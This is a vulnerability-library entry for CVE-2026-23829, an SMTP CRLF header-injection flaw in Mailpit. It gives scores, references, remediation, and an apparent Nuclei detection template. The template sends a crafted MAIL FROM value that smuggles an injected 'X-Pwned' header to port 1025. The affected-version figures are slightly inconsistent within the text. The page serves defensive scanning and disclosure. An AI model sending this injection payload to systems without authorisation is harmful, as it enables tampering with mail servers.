/Vulnerability Library

Mailpit < 1.28.2 - SMTP CRLF Injection

CVE-2026-23829
Verified

Description

Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server, letting attackers inject arbitrary SMTP headers, exploit requires crafted email addresses

Severity

Medium

CVSS Score

5.3

Exploit Probability

2%

Affected Product

mailpit

Published Date

January 21, 2026

Template Author

omarkurt

CVE-2026-23829.yaml
id: CVE-2026-23829

info:
  name: Mailpit < 1.28.2 - SMTP CRLF Injection
  author: omarkurt
  severity: medium
  description: |
    Mailpit < 1.28 contains a header injection caused by insufficient regex validation of `RCPT TO` and `MAIL FROM` addresses in the SMTP server, letting attackers inject arbitrary SMTP headers, exploit requires crafted email addresses
  impact: |
    An attacker can inject arbitrary headers into captured emails, corrupt existing headers like the Received header, and generate malformed .eml files. This violates RFC 5321 which forbids control characters in envelope addresses.
  remediation: |
    Upgrade Mailpit to version 1.28.3 or later which updates the regex to explicitly exclude all ASCII control characters (\x00-\x1f) from email addresses.
  reference:
    - https://rosecurify.com/advisories/RO-26-002-mailpit-smtp-header-injection/
    - https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-23829
    epss-score: 0.01594
    epss-percentile: 0.81906
    cwe-id: CWE-93
    cpe: cpe:2.3:a:axllent:mailpit:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: axllent
    product: mailpit
    shodan-query: title:"Mailpit"
    fofa-query: title="Mailpit"
  tags: cve,cve2026,tcp,crlf,smtp,mailpit,


tcp:
  - inputs:
      - data: "EHLO {{Hostname}}\r\n"
      - data: "MAIL FROM:<attacker\rX-Pwned:{{randstr}}>\r\n"
      - data: "RCPT TO:<victim@example.com>\r\n"
      - data: "DATA\r\n"
      - data: "Subject: Test \r\n\r\nCombined Template Check.\r\n.\r\n"
      - data: "QUIT\r\n"

    host:
      - "{{Hostname}}"
    port: 1025
    read-size: 2048

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "250"

      - type: word
        words:
          - "501"
          - "500"
          - "553"
        negative: true
# digest: 4a0a00473045022066181291afd21416f8f781a061eef7905160183f78bd837ba248f8b816af503a022100ded12c2f8e7a847902acc1b8a43b955ffb12a95887b11e80ac65297484b11a91:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE ID:
cve-2026-23829
CWE ID:
cwe-93

References

https://rosecurify.com/advisories/RO-26-002-mailpit-smtp-header-injection/https://github.com/axllent/mailpit/security/advisories/GHSA-54wq-72mp-cq7c

Remediation Steps

Upgrade Mailpit to version 1.28.3 or later which updates the regex to explicitly exclude all ASCII control characters (\x00-\x1f) from email addresses.